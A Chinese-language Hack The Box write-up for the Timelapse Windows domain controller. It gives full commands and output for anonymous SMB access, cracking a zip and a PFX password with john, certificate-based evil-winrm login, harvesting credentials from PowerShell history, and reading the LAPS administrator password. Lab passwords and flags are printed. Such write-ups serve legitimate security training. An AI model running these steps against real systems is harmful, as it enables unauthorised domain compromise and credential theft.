Timelapse-htb-writeup

0x00 靶场技能介绍

章节技能:SMB匿名访问、zip2john使用、pfx2john使用、.pfx提取秘钥和证书、evil-winrm 使用秘钥和证书登录、powershell历史命令记录敏感信息泄露、LAPS特权组成员

参考链接:https://0xdf.gitlab.io/2022/08/20/htb-timelapse.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.11.152

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -sU --min-rate=10000 10.10.11.152
[sudo] kali 的密码:
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.152 -oG allports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49727/tcp open  unknown


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,88,135,139,389,445,593,636,3268,3269,5986,9389,49667,49673,49674,49727 -sV -sC --min-rate=10000 10.10.11.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 21:51 CST
Nmap scan report for 10.10.11.152
Host is up (0.30s latency).

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-03-19 21:52:08Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-03-19T21:55:21+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-title: Not Found
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49727/tcp open  unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time: 
|   date: 2024-03-19T21:54:27
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

3、绑定下本地hosts域名

1
2
┌──(root㉿offsec)-[~]
└─# echo '10.10.11.152 dc01.timelapse.htb timelapse.htb' >> /etc/hosts

4、查看下是否存在SMB匿名访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.152 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

5、逐个访问下,看看有什么发现没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> pwd
Current directory is \\10.10.11.152\SYSVOL\
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 23:39:15 2021
  ..                                  D        0  Mon Oct 25 23:39:15 2021
  Dev                                 D        0  Tue Oct 26 03:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 23:48:42 2021

                6367231 blocks of size 4096. 1264689 blocks available
smb: \> cd Dev\
smb: \Dev\> ls
  .                                   D        0  Tue Oct 26 03:40:06 2021
  ..                                  D        0  Tue Oct 26 03:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 23:46:42 2021

                6367231 blocks of size 4096. 1263607 blocks available
smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \Dev\> cd ../
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 23:48:42 2021
  ..                                  D        0  Mon Oct 25 23:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 22:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 22:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 22:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 22:57:44 2021

                6367231 blocks of size 4096. 1260293 blocks available
smb: \HelpDesk\>


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.152\\NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

6、获取的压缩包有密码,需要转码为可以破解的格式,并破解下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿offsec)-[~/Desktop]
└─$ zip2john winrm_backup.zip > hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash  --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2024-03-19 23:03) 3.448g/s 11977Kp/s 11977Kc/s 11977KC/s suzyqzb..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

7、成功获取到密码,但是解码发现的 legacyy_dev_auth.pfx 文件依旧存在密码,需要继续破解下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿offsec)-[~/Desktop]
└─$ pfx2john legacyy_dev_auth.pfx > hash1

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash1 --wordlist=/usr/share/wordlists/rockyou.txt 
[sudo] kali 的密码:
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:13 DONE (2024-03-19 23:07) 0.01357g/s 43873p/s 43873c/s 43873C/s thyriana..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

8、经过摸索,可以知道这个是个秘钥证书,可以分离出来一个证书和一个秘钥,然后使用这两个文件就可以登录服务器了

https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

9、提取密钥,有了密码,我就可以提取密钥和证书。提取密钥时,它会要求输入密码(我将提供“thuglegacy”),然后是输出.pem文件的密码(我想要的任何内容,必须至少为四个字符):

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

10、我将使用上面设置的密码解密密钥,这样我就不必记住它:

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
Enter pass phrase for legacyy_dev_auth.key-enc:
writing RSA key

11、并转储证书:

1
2
3
┌──(kali㉿offsec)-[~/Desktop]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:

12、evil-winrm是从 Linux 主机连接到 WinRM 的最佳工具。查看用法显示我将如何使用这些键进行连接:

1
2
3
4
-S- 启用 SSL,因为我正在连接到 5986
-c legacyy_dev_auth.crt- 提供公钥证书
-k legacyy_dev_auth.key- 提供私钥
-i timelapse.htb- 要连接的主机

13、尝试进行连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/19/2024   2:46 PM             34 user.txt


t*Evil-WinRM* PS C:\Users\legacyy\Desktop>

14、读取第一个flag信息

1
2
3
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
52787067844ef122efe2d2a0dc2fdfc2
*Evil-WinRM* PS C:\Users\legacyy\Desktop>

0x02 系统权限获取

15、枚举当前用户和用户详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> net user legacyy
User name                    legacyy
Full Name                    Legacyy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/23/2021 12:17:10 PM
Password expires             Never
Password changeable          10/24/2021 12:17:10 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/20/2024 3:18:33 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *Development
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents>

16、查看当前用户特权信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\Documents>


net group "Domain Users" /domain

*Evil-WinRM* PS C:\Users\legacyy\Documents>

17、查询当前域用户组成员

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\legacyy\Documents> net group "Domain Users" /domain
Group name     Domain Users
Comment        All domain users

Members

-------------------------------------------------------------------------------
Administrator            babywyrm                 krbtgt
legacyy                  payl0ad                  sinfulz
svc_deploy               thecybergeek             TRX
The command completed successfully.

*Evil-WinRM* PS C:\Users\legacyy\Documents>

18、检索powershell 历史记录信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
*Evil-WinRM* PS C:\Users\legacyy\Documents> (Get-PSReadlineOption).HistorySavePath
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> 


*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> dir


    Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2022  11:46 PM            434 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

19、发现了一个账号密码信息,尝试进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

20、继续查看当前用户信息和特权情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/20/2024 3:50:13 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

21、查看当前用户新发现的这个异常组的情况

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net groups "LAPS_Readers" /domain
Group name     LAPS_Readers
Comment

Members

-------------------------------------------------------------------------------
svc_deploy
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

22、经过各种搜集,发现了以下信息

1
2
3
4
5
通过 LAPS,DC 可以管理域中计算机的本地管理员密码。创建一组用户并授予他们读取这些密码的权限是很常见的,从而允许受信任的管理员访问所有本地管理员密码。

要读取 LAPS 密码,我只需要使用Get-ADComputer并特别请求该ms-mcs-admpwd属性:

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

23、按照提示,获取管理员密码信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer DC01 -property 'ms-mcs-admpwd'


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName       : dc01.timelapse.htb
Enabled           : True
ms-mcs-admpwd     : S92[l]pPJ8bYZI%0dS1siQ;1
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :



*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

24、尝试使用获取的密码信息进行登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i timelapse.htb -S -u administrator -p 'S92[l]pPJ8bYZI%0dS1siQ;1'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop>

25、获取最终flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir


    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/20/2024   2:59 AM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
dc9c080e10210fc114e26296d2500f01
*Evil-WinRM* PS C:\Users\TRX\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/452

打靶记
#shooting-range
Timelapse-htb-writeup
https://sh1yan.top/2024/03/19/Timelapse-htb-writeup/
作者
shiyan
发布于
2024年3月19日
许可协议